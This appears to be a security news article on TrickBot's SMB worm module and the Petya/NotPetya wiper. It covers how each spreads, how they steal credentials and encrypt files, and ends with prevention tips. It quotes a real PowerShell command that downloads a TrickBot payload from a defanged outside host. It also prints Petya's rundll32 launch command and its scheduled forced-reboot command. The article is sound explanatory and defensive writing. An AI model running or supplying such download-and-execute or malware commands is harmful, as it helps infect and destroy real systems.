Banking Trojan TrickBot uses self-spreading like WannaCry

Security researchers have now discovered a group of cyber criminals that are attempting to give its banking Trojan Trickbot  the self-spreading worm-like capabilities that made recent ransomware attacks go worldwide.

The new version of credential stealing TrickBot banking Trojan, known as “1000029” (v24), has been found using the Windows Server Message Block (SMB)—that allowed WannaCry and Petya to spread across the world quickly.

TrickBot is a banking Trojan malware that has been targeting financial institutions across the world since last year.

The Trojan generally spreads via email attachments impersonating invoices from a large unnamed “international financial institution,” but actually leads victims to a fake login page used to steal credentials.

The researchers at FlashPoint have discovered that the Trickbot gang appears to be testing a worm-like malware propagation module, which appears to spread locally via Server Message Block (SMB), scan domains for lists of servers via NetServerEnum Windows API, and enumerate other computers via Lightweight Directory Access Protocol (LDAP) enumeration.
The new TrickBot variant can also be disguised as ‘setup.exe’ and delivered through a PowerShell script to spread through interprocess communication and download additional version of TrickBot onto shared drives.

The Trickbot’s “MachineFinder” and “netscan” functions appear to leverage the following techniques:

• NetServer Enumeration function

• LDAP Enumeration

More specifically, the malware appears to enumerate all computers that are not domain controllers and resolve them to domains to IPs via gethostbyname and inet_ntoa Windows API.

The malware appears to leverage the IPC (interprocess communication) share to propagate and execute a PowerShell script as a final payload to download another Trickbot malware, masked as “setup[.]exe,” into the shared drive.

The following PowerShell script was observed in the worm module:

powershell -Command “(New-Object Net.WebClient).DownloadFile(‘hxxp://c93211do[.]beget[.]tech/worm[.]bin[.]exe’, ‘setup[.]exe’)”

In order to safeguard against such malware infection, you should always be suspicious of unwanted files and documents sent over an email and should never click on links inside them unless verifying the source and also make sure that you run an effective anti-virus security suite on your system, and keep it up-to-date

Petya Ransomware hits the Globe

petya-ransomware-attack-1

On 27 June a nasty piece of ransomware (now declared as a wiper malware) struck the globe within the 2 months of previous ransomware outbreak i.e. WannaCry. The Petya ransomware(now Known as NotPetya Malware) attacks that began infecting computers in several countries, including Russia, Ukraine, France, India and the United States on Tuesday and demands $300 ransom was not designed with the intention of restoring the computers at all. The virus was designed to look like ransomware but was wiper malware that wipes computers outright, destroying all records from the targeted systems. The Email id used to receive the payments in Bitcoin has been shut down so even though the ransom is paid files will not be recovered.

Similar to WannaCry, Petya uses the Eternal Blue exploit as one of the means to propagate itself. However it also uses classic SMB network spreading techniques, meaning that it can spread within organizations, even if they’ve patched against Eternal Blue.

It has been confirmed that MEDoc, a tax and accounting software package, is used for the initial insertion of Petya into corporate networks. MEDoc is widely used in Ukraine, indicating that organizations in that country were the primary target.

After gaining an initial foothold, Petya then uses a variety of methods to spread across corporate networks.

What makes it dangerous? Unlike other ransomware viruses, it encrypts the Master File Table (MFT) for NTFS partitions. Each file on an NTFS volume is represented by a record in a special file called the master file table (MFT). If the MFT is corrupted the file system structure on the disk becomes unusable. It also overwrites MBR (Master Boot Record) with a custom bootloader that shows a ransom note and prevents the victim from booting their computer. This means that once a machine is infected it is in a complete state of lockdown. This makes it more intrusive. In comparison, the WannaCry ransomware virus targeted only specific file extensions while still allowing the operating system access.

INFECTION AND INSTALLATION

According to Symantec , Petya is initially executed via rundll32.exe using the following command:

  • rundll32.exe perfc.dat

Once the DLL has been loaded, it will first attempt to remove itself from the infected system. This is done by opening the file and overwriting its contents with null bytes before finally deleting the file from disk. Overwriting the file with null bytes is used as an attempt to thwart recovery of the file using forensic techniques.

Next, it attempts to create the following file to be used as a flag indicating that the computer has been infected:

  • C:\Windows\perfc

Once installed, Petya proceeds to modify the master boot record (MBR). This allows it to hijack the normal loading process of the infected computer during the next system reboot. The modified MBR is used to encrypt the hard disk while simulating a CHKDSK screen. It then displays a ransom note to the user.

MBR modification does not succeed if the threat is executed as a normal user but the threat will still attempt to spread across the network

At this point, a system reboot is scheduled using the following command:

  • “/c at 00:49 C:\Windows\system32\shutdown.exe /r /f”

By scheduling and not forcing a reboot, it provides time to allow Petya to spread to other computers in the network before user-mode encryption occurs.

Once Petya does get into a local network, however, there are several concurrent mechanisms for it to spread to further local machines. The first and foremost is the ETERNALBLUE exploit. The next mechanism is to use mimikatz to dump credentials and use said credentials to run itself in local LAN computers using either PsExec or wmic.exe.

The following 4 steps are followed by the malware to spread itself:

  1. Tries to find credentials:
    • Method 1: Uses a custom tool to extract credentials from memory (code similarities with MimiKatz and accesses Windows LSASS process)
    • Method 2: Steals credentials from the credential store on the infected systems
  2. Makes an inventory of the local network for other machines. If found, it checks whether port 139 or 445 is open
  3. Checks via WebDAV whether the enumerated systems have already been infected. If this is not the case, it will transfer the malware to the other systems via SMB;
  4. Utilizes PSEXEC or WMI tools, to remotely execute the malware.

Once spreading has occurred, Petya then lists all files on any fixed drive (e.g. C:\) and checks for any of the following file extensions (skipping the %Windir% directory of that drive):

.3ds .7z .accdb .ai .asp .aspx .avhd .back .bak .c .cfg .conf .cpp .cs .ctl .dbf .disk .djvu .doc .docx .dwg .eml .fdb .gz .h. hdd .kdbx .mail .mdb .msg .nrg .ora .ost .ova .ovf .pdf .php .pmf .ppt .pptx .pst .pvi .py .pyc .rar .rtf .sln .sql .tar .vbox .vbs .vcb .vdi .vfd .vmc .vmdk .vmsd .vmx .vsdx .vsv .work .xls .xlsx .xvd .zip

An AES 128 bit key is generated for each drive. If any of the file extensions match that of the above list, the malware proceeds to encrypt the first 1MB of the file using the generated key.

After encrypting all eligible files, the threat will generate the ransom note and write it to a “README.TXT” file in the current drive.

The generated AES key(s) then encrypts itself using an embedded public key.

The resulting encrypted blob is then appended to the end of the ransom note (README.TXT) as a Base64 encoded string. The ransom note refers to this as the “installation key”.

The generated key is then destroyed to ensure it cannot be retrieved from memory.

At this point, the system is rebooted and the modified MBR code loads the simulated CHKDSK screen and full disk encryption occurs.

PREVENTION 

Checking if you are at risk for this attack involves multiple actions, due to the fact that the attack itself uses different methods to propagate within networks. The following actions can be performed to identify potential vulnerable machines within the network:

  • Perform a network portscan to identify systems on which the TCP ports 139 and 445 are open. The more machines that are accessible on these ports, the more potential risk of the attack spreading to large amounts of systems within the network.
  • Perform a vulnerability scan to identify machines which are missing the MS17-010 (and the KB2871997) patch. If the patches are missing, the identified systems are vulnerable to the one of the spreading and infection methods used by the malware.
  • Create a file perfc. C:\Windows\perfc beforehand.